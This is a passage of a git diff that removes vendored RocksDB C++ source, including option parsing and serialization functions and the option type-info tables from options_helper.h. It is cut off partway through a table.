-    case OptionType::kCompactionFilter: {
-      // it's a const pointer of const CompactionFilter*
-      const auto* ptr =
-          reinterpret_cast<const CompactionFilter* const*>(opt_address);
-      *value = *ptr ? (*ptr)->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kCompactionFilterFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<CompactionFilterFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kMemTableRepFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<MemTableRepFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kMergeOperator: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<MergeOperator>*>(opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kFilterPolicy: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<FilterPolicy>*>(opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kChecksumType:
-      return SerializeEnum<ChecksumType>(
-          checksum_type_string_map,
-          *reinterpret_cast<const ChecksumType*>(opt_address), value);
-    case OptionType::kBlockBasedTableIndexType:
-      return SerializeEnum<BlockBasedTableOptions::IndexType>(
-          block_base_table_index_type_string_map,
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(
-              opt_address),
-          value);
-    case OptionType::kFlushBlockPolicyFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<FlushBlockPolicyFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kEncodingType:
-      return SerializeEnum<EncodingType>(
-          encoding_type_string_map,
-          *reinterpret_cast<const EncodingType*>(opt_address), value);
-    case OptionType::kWALRecoveryMode:
-      return SerializeEnum<WALRecoveryMode>(
-          wal_recovery_mode_string_map,
-          *reinterpret_cast<const WALRecoveryMode*>(opt_address), value);
-    case OptionType::kAccessHint:
-      return SerializeEnum<DBOptions::AccessHint>(
-          access_hint_string_map,
-          *reinterpret_cast<const DBOptions::AccessHint*>(opt_address), value);
-    case OptionType::kInfoLogLevel:
-      return SerializeEnum<InfoLogLevel>(
-          info_log_level_string_map,
-          *reinterpret_cast<const InfoLogLevel*>(opt_address), value);
-    default:
-      return false;
-  }
-  return true;
-}
-
-Status GetMutableOptionsFromStrings(
-    const MutableCFOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableCFOptions* new_options) {
-  assert(new_options);
-  *new_options = base_options;
-  for (const auto& o : options_map) {
-    try {
-      auto iter = cf_options_type_info.find(o.first);
-      if (iter == cf_options_type_info.end()) {
-        return Status::InvalidArgument("Unrecognized option: " + o.first);
-      }
-      const auto& opt_info = iter->second;
-      if (!opt_info.is_mutable) {
-        return Status::InvalidArgument("Option not changeable: " + o.first);
-      }
-      bool is_ok = ParseOptionHelper(
-          reinterpret_cast<char*>(new_options) + opt_info.mutable_offset,
-          opt_info.type, o.second);
-      if (!is_ok) {
-        return Status::InvalidArgument("Error parsing " + o.first);
-      }
-    } catch (std::exception& e) {
-      return Status::InvalidArgument("Error parsing " + o.first + ":" +
-                                     std::string(e.what()));
-    }
-  }
-  return Status::OK();
-}
-
-Status GetMutableDBOptionsFromStrings(
-    const MutableDBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableDBOptions* new_options) {
-  assert(new_options);
-  *new_options = base_options;
-  for (const auto& o : options_map) {
-    try {
-      auto iter = db_options_type_info.find(o.first);
-      if (iter == db_options_type_info.end()) {
-        return Status::InvalidArgument("Unrecognized option: " + o.first);
-      }
-      const auto& opt_info = iter->second;
-      if (!opt_info.is_mutable) {
-        return Status::InvalidArgument("Option not changeable: " + o.first);
-      }
-      bool is_ok = ParseOptionHelper(
-          reinterpret_cast<char*>(new_options) + opt_info.mutable_offset,
-          opt_info.type, o.second);
-      if (!is_ok) {
-        return Status::InvalidArgument("Error parsing " + o.first);
-      }
-    } catch (std::exception& e) {
-      return Status::InvalidArgument("Error parsing " + o.first + ":" +
-                                     std::string(e.what()));
-    }
-  }
-  return Status::OK();
-}
-
-Status StringToMap(const std::string& opts_str,
-                   std::unordered_map<std::string, std::string>* opts_map) {
-  assert(opts_map);
-  // Example:
-  //   opts_str = "write_buffer_size=1024;max_write_buffer_number=2;"
-  //              "nested_opt={opt1=1;opt2=2};max_bytes_for_level_base=100"
-  size_t pos = 0;
-  std::string opts = trim(opts_str);
-  while (pos < opts.size()) {
-    size_t eq_pos = opts.find('=', pos);
-    if (eq_pos == std::string::npos) {
-      return Status::InvalidArgument("Mismatched key value pair, '=' expected");
-    }
-    std::string key = trim(opts.substr(pos, eq_pos - pos));
-    if (key.empty()) {
-      return Status::InvalidArgument("Empty key found");
-    }
-
-    // skip space after '=' and look for '{' for possible nested options
-    pos = eq_pos + 1;
-    while (pos < opts.size() && isspace(opts[pos])) {
-      ++pos;
-    }
-    // Empty value at the end
-    if (pos >= opts.size()) {
-      (*opts_map)[key] = "";
-      break;
-    }
-    if (opts[pos] == '{') {
-      int count = 1;
-      size_t brace_pos = pos + 1;
-      while (brace_pos < opts.size()) {
-        if (opts[brace_pos] == '{') {
-          ++count;
-        } else if (opts[brace_pos] == '}') {
-          --count;
-          if (count == 0) {
-            break;
-          }
-        }
-        ++brace_pos;
-      }
-      // found the matching closing brace
-      if (count == 0) {
-        (*opts_map)[key] = trim(opts.substr(pos + 1, brace_pos - pos - 1));
-        // skip all whitespace and move to the next ';'
-        // brace_pos points to the next position after the matching '}'
-        pos = brace_pos + 1;
-        while (pos < opts.size() && isspace(opts[pos])) {
-          ++pos;
-        }
-        if (pos < opts.size() && opts[pos] != ';') {
-          return Status::InvalidArgument(
-              "Unexpected chars after nested options");
-        }
-        ++pos;
-      } else {
-        return Status::InvalidArgument(
-            "Mismatched curly braces for nested options");
-      }
-    } else {
-      size_t sc_pos = opts.find(';', pos);
-      if (sc_pos == std::string::npos) {
-        (*opts_map)[key] = trim(opts.substr(pos));
-        // It either ends with a trailing semi-colon or the last key-value pair
-        break;
-      } else {
-        (*opts_map)[key] = trim(opts.substr(pos, sc_pos - pos));
-      }
-      pos = sc_pos + 1;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status ParseColumnFamilyOption(const std::string& name,
-                               const std::string& org_value,
-                               ColumnFamilyOptions* new_options,
-                               bool input_strings_escaped = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  try {
-    if (name == "block_based_table_factory") {
-      // Nested options
-      BlockBasedTableOptions table_opt, base_table_options;
-      BlockBasedTableFactory* block_based_table_factory =
-          static_cast_with_check<BlockBasedTableFactory, TableFactory>(
-              new_options->table_factory.get());
-      if (block_based_table_factory != nullptr) {
-        base_table_options = block_based_table_factory->table_options();
-      }
-      Status table_opt_s = GetBlockBasedTableOptionsFromString(
-          base_table_options, value, &table_opt);
-      if (!table_opt_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->table_factory.reset(NewBlockBasedTableFactory(table_opt));
-    } else if (name == "plain_table_factory") {
-      // Nested options
-      PlainTableOptions table_opt, base_table_options;
-      PlainTableFactory* plain_table_factory =
-          static_cast_with_check<PlainTableFactory, TableFactory>(
-              new_options->table_factory.get());
-      if (plain_table_factory != nullptr) {
-        base_table_options = plain_table_factory->table_options();
-      }
-      Status table_opt_s = GetPlainTableOptionsFromString(
-          base_table_options, value, &table_opt);
-      if (!table_opt_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->table_factory.reset(NewPlainTableFactory(table_opt));
-    } else if (name == "memtable") {
-      std::unique_ptr<MemTableRepFactory> new_mem_factory;
-      Status mem_factory_s =
-          GetMemTableRepFactoryFromString(value, &new_mem_factory);
-      if (!mem_factory_s.ok()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->memtable_factory.reset(new_mem_factory.release());
-    } else if (name == "compression_opts") {
-      size_t start = 0;
-      size_t end = value.find(':');
-      if (end == std::string::npos) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->compression_opts.window_bits =
-          ParseInt(value.substr(start, end - start));
-      start = end + 1;
-      end = value.find(':', start);
-      if (end == std::string::npos) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      new_options->compression_opts.level =
-          ParseInt(value.substr(start, end - start));
-      start = end + 1;
-      if (start >= value.size()) {
-        return Status::InvalidArgument(
-            "unable to parse the specified CF option " + name);
-      }
-      end = value.find(':', start);
-      new_options->compression_opts.strategy =
-          ParseInt(value.substr(start, value.size() - start));
-      // max_dict_bytes is optional for backwards compatibility
-      if (end != std::string::npos) {
-        start = end + 1;
-        if (start >= value.size()) {
-          return Status::InvalidArgument(
-              "unable to parse the specified CF option " + name);
-        }
-        new_options->compression_opts.max_dict_bytes =
-            ParseInt(value.substr(start, value.size() - start));
-      }
-    } else if (name == "compaction_options_fifo") {
-      new_options->compaction_options_fifo.max_table_files_size =
-          ParseUint64(value);
-    } else {
-      auto iter = cf_options_type_info.find(name);
-      if (iter == cf_options_type_info.end()) {
-        return Status::InvalidArgument(
-            "Unable to parse the specified CF option " + name);
-      }
-      const auto& opt_info = iter->second;
-      if (opt_info.verification != OptionVerificationType::kDeprecated &&
-          ParseOptionHelper(
-              reinterpret_cast<char*>(new_options) + opt_info.offset,
-              opt_info.type, value)) {
-        return Status::OK();
-      }
-      switch (opt_info.verification) {
-        case OptionVerificationType::kByName:
-        case OptionVerificationType::kByNameAllowNull:
-          return Status::NotSupported(
-              "Deserializing the specified CF option " + name +
-                  " is not supported");
-        case OptionVerificationType::kDeprecated:
-          return Status::OK();
-        default:
-          return Status::InvalidArgument(
-              "Unable to parse the specified CF option " + name);
-      }
-    }
-  } catch (const std::exception&) {
-    return Status::InvalidArgument(
-        "unable to parse the specified option " + name);
-  }
-  return Status::OK();
-}
-
-bool SerializeSingleDBOption(std::string* opt_string,
-                             const DBOptions& db_options,
-                             const std::string& name,
-                             const std::string& delimiter) {
-  auto iter = db_options_type_info.find(name);
-  if (iter == db_options_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&db_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-
-Status GetStringFromDBOptions(std::string* opt_string,
-                              const DBOptions& db_options,
-                              const std::string& delimiter) {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = db_options_type_info.begin();
-       iter != db_options_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleDBOption(&single_output, db_options,
-                                          iter->first, delimiter);
-    assert(result);
-    if (result) {
-      opt_string->append(single_output);
-    }
-  }
-  return Status::OK();
-}
-
-bool SerializeSingleColumnFamilyOption(std::string* opt_string,
-                                       const ColumnFamilyOptions& cf_options,
-                                       const std::string& name,
-                                       const std::string& delimiter) {
-  auto iter = cf_options_type_info.find(name);
-  if (iter == cf_options_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&cf_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-
-Status GetStringFromColumnFamilyOptions(std::string* opt_string,
-                                        const ColumnFamilyOptions& cf_options,
-                                        const std::string& delimiter) {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = cf_options_type_info.begin();
-       iter != cf_options_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleColumnFamilyOption(&single_output, cf_options,
-                                                    iter->first, delimiter);
-    if (result) {
-      opt_string->append(single_output);
-    } else {
-      return Status::InvalidArgument("failed to serialize %s\n",
-                                     iter->first.c_str());
-    }
-    assert(result);
-  }
-  return Status::OK();
-}
-
-Status GetStringFromCompressionType(std::string* compression_str,
-                                    CompressionType compression_type) {
-  bool ok = SerializeEnum<CompressionType>(compression_type_string_map,
-                                           compression_type, compression_str);
-  if (ok) {
-    return Status::OK();
-  } else {
-    return Status::InvalidArgument("Invalid compression types");
-  }
-}
-
-std::vector<CompressionType> GetSupportedCompressions() {
-  std::vector<CompressionType> supported_compressions;
-  for (const auto& comp_to_name : compression_type_string_map) {
-    CompressionType t = comp_to_name.second;
-    if (t != kDisableCompressionOption && CompressionTypeSupported(t)) {
-      supported_compressions.push_back(t);
-    }
-  }
-  return supported_compressions;
-}
-
-Status ParseDBOption(const std::string& name,
-                     const std::string& org_value,
-                     DBOptions* new_options,
-                     bool input_strings_escaped = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  try {
-    if (name == "rate_limiter_bytes_per_sec") {
-      new_options->rate_limiter.reset(
-          NewGenericRateLimiter(static_cast<int64_t>(ParseUint64(value))));
-    } else {
-      auto iter = db_options_type_info.find(name);
-      if (iter == db_options_type_info.end()) {
-        return Status::InvalidArgument("Unrecognized option DBOptions:", name);
-      }
-      const auto& opt_info = iter->second;
-      if (opt_info.verification != OptionVerificationType::kDeprecated &&
-          ParseOptionHelper(
-              reinterpret_cast<char*>(new_options) + opt_info.offset,
-              opt_info.type, value)) {
-        return Status::OK();
-      }
-      switch (opt_info.verification) {
-        case OptionVerificationType::kByName:
-        case OptionVerificationType::kByNameAllowNull:
-          return Status::NotSupported(
-              "Deserializing the specified DB option " + name +
-                  " is not supported");
-        case OptionVerificationType::kDeprecated:
-          return Status::OK();
-        default:
-          return Status::InvalidArgument(
-              "Unable to parse the specified DB option " + name);
-      }
-    }
-  } catch (const std::exception&) {
-    return Status::InvalidArgument("Unable to parse DBOptions:", name);
-  }
-  return Status::OK();
-}
-
-Status GetColumnFamilyOptionsFromMap(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  return GetColumnFamilyOptionsFromMapInternal(
-      base_options, opts_map, new_options, input_strings_escaped, nullptr,
-      ignore_unknown_options);
-}
-
-Status GetColumnFamilyOptionsFromMapInternal(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names,
-    bool ignore_unknown_options) {
-  assert(new_options);
-  *new_options = base_options;
-  if (unsupported_options_names) {
-    unsupported_options_names->clear();
-  }
-  for (const auto& o : opts_map) {
-    auto s = ParseColumnFamilyOption(o.first, o.second, new_options,
-                                 input_strings_escaped);
-    if (!s.ok()) {
-      if (s.IsNotSupported()) {
-        // If the deserialization of the specified option is not supported
-        // and an output vector of unsupported_options is provided, then
-        // we log the name of the unsupported option and proceed.
-        if (unsupported_options_names != nullptr) {
-          unsupported_options_names->push_back(o.first);
-        }
-        // Note that we still return Status::OK in such case to maintain
-        // the backward compatibility in the old public API defined in
-        // rocksdb/convenience.h
-      } else if (s.IsInvalidArgument() && ignore_unknown_options) {
-        continue;
-      } else {
-        // Restore "new_options" to the default "base_options".
-        *new_options = base_options;
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status GetColumnFamilyOptionsFromString(
-    const ColumnFamilyOptions& base_options,
-    const std::string& opts_str,
-    ColumnFamilyOptions* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    *new_options = base_options;
-    return s;
-  }
-  return GetColumnFamilyOptionsFromMap(base_options, opts_map, new_options);
-}
-
-Status GetDBOptionsFromMap(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  return GetDBOptionsFromMapInternal(base_options, opts_map, new_options,
-                                     input_strings_escaped, nullptr,
-                                     ignore_unknown_options);
-}
-
-Status GetDBOptionsFromMapInternal(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names,
-    bool ignore_unknown_options) {
-  assert(new_options);
-  *new_options = base_options;
-  if (unsupported_options_names) {
-    unsupported_options_names->clear();
-  }
-  for (const auto& o : opts_map) {
-    auto s = ParseDBOption(o.first, o.second,
-                           new_options, input_strings_escaped);
-    if (!s.ok()) {
-      if (s.IsNotSupported()) {
-        // If the deserialization of the specified option is not supported
-        // and an output vector of unsupported_options is provided, then
-        // we log the name of the unsupported option and proceed.
-        if (unsupported_options_names != nullptr) {
-          unsupported_options_names->push_back(o.first);
-        }
-        // Note that we still return Status::OK in such case to maintain
-        // the backward compatibility in the old public API defined in
-        // rocksdb/convenience.h
-      } else if (s.IsInvalidArgument() && ignore_unknown_options) {
-        continue;
-      } else {
-        // Restore "new_options" to the default "base_options".
-        *new_options = base_options;
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status GetDBOptionsFromString(
-    const DBOptions& base_options,
-    const std::string& opts_str,
-    DBOptions* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    *new_options = base_options;
-    return s;
-  }
-  return GetDBOptionsFromMap(base_options, opts_map, new_options);
-}
-
-Status GetOptionsFromString(const Options& base_options,
-                            const std::string& opts_str, Options* new_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-  DBOptions new_db_options(base_options);
-  ColumnFamilyOptions new_cf_options(base_options);
-  for (const auto& o : opts_map) {
-    if (ParseDBOption(o.first, o.second, &new_db_options).ok()) {
-    } else if (ParseColumnFamilyOption(
-        o.first, o.second, &new_cf_options).ok()) {
-    } else {
-      return Status::InvalidArgument("Can't parse option " + o.first);
-    }
-  }
-  *new_options = Options(new_db_options, new_cf_options);
-  return Status::OK();
-}
-
-Status GetTableFactoryFromMap(
-    const std::string& factory_name,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    std::shared_ptr<TableFactory>* table_factory, bool ignore_unknown_options) {
-  Status s;
-  if (factory_name == BlockBasedTableFactory().Name()) {
-    BlockBasedTableOptions bbt_opt;
-    s = GetBlockBasedTableOptionsFromMap(BlockBasedTableOptions(), opt_map,
-                                         &bbt_opt,
-                                         true, /* input_strings_escaped */
-                                         ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    table_factory->reset(new BlockBasedTableFactory(bbt_opt));
-    return Status::OK();
-  } else if (factory_name == PlainTableFactory().Name()) {
-    PlainTableOptions pt_opt;
-    s = GetPlainTableOptionsFromMap(PlainTableOptions(), opt_map, &pt_opt,
-                                    true, /* input_strings_escaped */
-                                    ignore_unknown_options);
-    if (!s.ok()) {
-      return s;
-    }
-    table_factory->reset(new PlainTableFactory(pt_opt));
-    return Status::OK();
-  }
-  // Return OK for not supported table factories as TableFactory
-  // Deserialization is optional.
-  table_factory->reset();
-  return Status::OK();
-}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_helper.h b/thirdparty/rocksdb/options/options_helper.h
deleted file mode 100644
index 67b0427..0000000
--- a/thirdparty/rocksdb/options/options_helper.h
+++ /dev/null
@@ -1,650 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <stdexcept>
-#include <string>
-#include <vector>
-
-#include "options/cf_options.h"
-#include "options/db_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-DBOptions BuildDBOptions(const ImmutableDBOptions& immutable_db_options,
-                         const MutableDBOptions& mutable_db_options);
-
-ColumnFamilyOptions BuildColumnFamilyOptions(
-    const ColumnFamilyOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options);
-
-static std::map<CompactionStyle, std::string> compaction_style_to_string = {
-    {kCompactionStyleLevel, "kCompactionStyleLevel"},
-    {kCompactionStyleUniversal, "kCompactionStyleUniversal"},
-    {kCompactionStyleFIFO, "kCompactionStyleFIFO"},
-    {kCompactionStyleNone, "kCompactionStyleNone"}};
-
-static std::map<CompactionPri, std::string> compaction_pri_to_string = {
-    {kByCompensatedSize, "kByCompensatedSize"},
-    {kOldestLargestSeqFirst, "kOldestLargestSeqFirst"},
-    {kOldestSmallestSeqFirst, "kOldestSmallestSeqFirst"},
-    {kMinOverlappingRatio, "kMinOverlappingRatio"}};
-
-static std::map<CompactionStopStyle, std::string>
-    compaction_stop_style_to_string = {
-        {kCompactionStopStyleSimilarSize, "kCompactionStopStyleSimilarSize"},
-        {kCompactionStopStyleTotalSize, "kCompactionStopStyleTotalSize"}};
-
-static std::unordered_map<std::string, ChecksumType> checksum_type_string_map =
-    {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}};
-
-#ifndef ROCKSDB_LITE
-
-Status GetMutableOptionsFromStrings(
-    const MutableCFOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableCFOptions* new_options);
-
-Status GetMutableDBOptionsFromStrings(
-    const MutableDBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableDBOptions* new_options);
-
-Status GetTableFactoryFromMap(
-    const std::string& factory_name,
-    const std::unordered_map<std::string, std::string>& opt_map,
-    std::shared_ptr<TableFactory>* table_factory,
-    bool ignore_unknown_options = false);
-
-enum class OptionType {
-  kBoolean,
-  kInt,
-  kVectorInt,
-  kUInt,
-  kUInt32T,
-  kUInt64T,
-  kSizeT,
-  kString,
-  kDouble,
-  kCompactionStyle,
-  kCompactionPri,
-  kSliceTransform,
-  kCompressionType,
-  kVectorCompressionType,
-  kTableFactory,
-  kComparator,
-  kCompactionFilter,
-  kCompactionFilterFactory,
-  kMergeOperator,
-  kMemTableRepFactory,
-  kBlockBasedTableIndexType,
-  kFilterPolicy,
-  kFlushBlockPolicyFactory,
-  kChecksumType,
-  kEncodingType,
-  kWALRecoveryMode,
-  kAccessHint,
-  kInfoLogLevel,
-  kUnknown
-};
-
-enum class OptionVerificationType {
-  kNormal,
-  kByName,           // The option is pointer typed so we can only verify
-                     // based on it's name.
-  kByNameAllowNull,  // Same as kByName, but it also allows the case
-                     // where one of them is a nullptr.
-  kDeprecated        // The option is no longer used in rocksdb. The RocksDB
-                     // OptionsParser will still accept this option if it
-                     // happen to exists in some Options file.  However, the
-                     // parser will not include it in serialization and
-                     // verification processes.
-};
-
-// A struct for storing constant option information such as option name,
-// option type, and offset.
-struct OptionTypeInfo {
-  int offset;
-  OptionType type;
-  OptionVerificationType verification;
-  bool is_mutable;
-  int mutable_offset;
-};
-
-// A helper function that converts "opt_address" to a std::string
-// based on the specified OptionType.
-bool SerializeSingleOptionHelper(const char* opt_address,
-                                 const OptionType opt_type, std::string* value);
-
-// In addition to its public version defined in rocksdb/convenience.h,
-// this further takes an optional output vector "unsupported_options_names",
-// which stores the name of all the unsupported options specified in "opts_map".
-Status GetDBOptionsFromMapInternal(
-    const DBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    DBOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names = nullptr,
-    bool ignore_unknown_options = false);
-
-// In addition to its public version defined in rocksdb/convenience.h,
-// this further takes an optional output vector "unsupported_options_names",
-// which stores the name of all the unsupported options specified in "opts_map".
-Status GetColumnFamilyOptionsFromMapInternal(
-    const ColumnFamilyOptions& base_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    ColumnFamilyOptions* new_options, bool input_strings_escaped,
-    std::vector<std::string>* unsupported_options_names = nullptr,
-    bool ignore_unknown_options = false);
-
-static std::unordered_map<std::string, OptionTypeInfo> db_options_type_info = {
-    /*
-     // not yet supported
-      Env* env;
-      std::shared_ptr<Cache> row_cache;
-      std::shared_ptr<DeleteScheduler> delete_scheduler;
-      std::shared_ptr<Logger> info_log;
-      std::shared_ptr<RateLimiter> rate_limiter;
-      std::shared_ptr<Statistics> statistics;
-      std::vector<DbPath> db_paths;
-      std::vector<std::shared_ptr<EventListener>> listeners;
-     */
-    {"advise_random_on_open",
-     {offsetof(struct DBOptions, advise_random_on_open), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_mmap_reads",
-     {offsetof(struct DBOptions, allow_mmap_reads), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_fallocate",
-     {offsetof(struct DBOptions, allow_fallocate), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_mmap_writes",
-     {offsetof(struct DBOptions, allow_mmap_writes), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_direct_reads",
-     {offsetof(struct DBOptions, use_direct_reads), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_direct_writes",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"use_direct_io_for_flush_and_compaction",
-     {offsetof(struct DBOptions, use_direct_io_for_flush_and_compaction),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"allow_2pc",
-     {offsetof(struct DBOptions, allow_2pc), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_os_buffer",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"create_if_missing",
-     {offsetof(struct DBOptions, create_if_missing), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"create_missing_column_families",
-     {offsetof(struct DBOptions, create_missing_column_families),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"disableDataSync",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"disable_data_sync",  // for compatibility
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"enable_thread_tracking",
-     {offsetof(struct DBOptions, enable_thread_tracking), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"error_if_exists",
-     {offsetof(struct DBOptions, error_if_exists), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"is_fd_close_on_exec",
-     {offsetof(struct DBOptions, is_fd_close_on_exec), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"paranoid_checks",
-     {offsetof(struct DBOptions, paranoid_checks), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"skip_log_error_on_recovery",
-     {offsetof(struct DBOptions, skip_log_error_on_recovery),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"skip_stats_update_on_db_open",
-     {offsetof(struct DBOptions, skip_stats_update_on_db_open),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"new_table_reader_for_compaction_inputs",
-     {offsetof(struct DBOptions, new_table_reader_for_compaction_inputs),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"compaction_readahead_size",
-     {offsetof(struct DBOptions, compaction_readahead_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"random_access_max_buffer_size",
-     {offsetof(struct DBOptions, random_access_max_buffer_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"writable_file_max_buffer_size",
-     {offsetof(struct DBOptions, writable_file_max_buffer_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"use_adaptive_mutex",
-     {offsetof(struct DBOptions, use_adaptive_mutex), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"use_fsync",
-     {offsetof(struct DBOptions, use_fsync), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_background_jobs",
-     {offsetof(struct DBOptions, max_background_jobs), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_background_jobs)}},
-    {"max_background_compactions",
-     {offsetof(struct DBOptions, max_background_compactions), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_background_compactions)}},
-    {"base_background_compactions",
-     {offsetof(struct DBOptions, base_background_compactions), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, base_background_compactions)}},
-    {"max_background_flushes",
-     {offsetof(struct DBOptions, max_background_flushes), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_file_opening_threads",
-     {offsetof(struct DBOptions, max_file_opening_threads), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_open_files",
-     {offsetof(struct DBOptions, max_open_files), OptionType::kInt,
-      OptionVerificationType::kNormal, true,
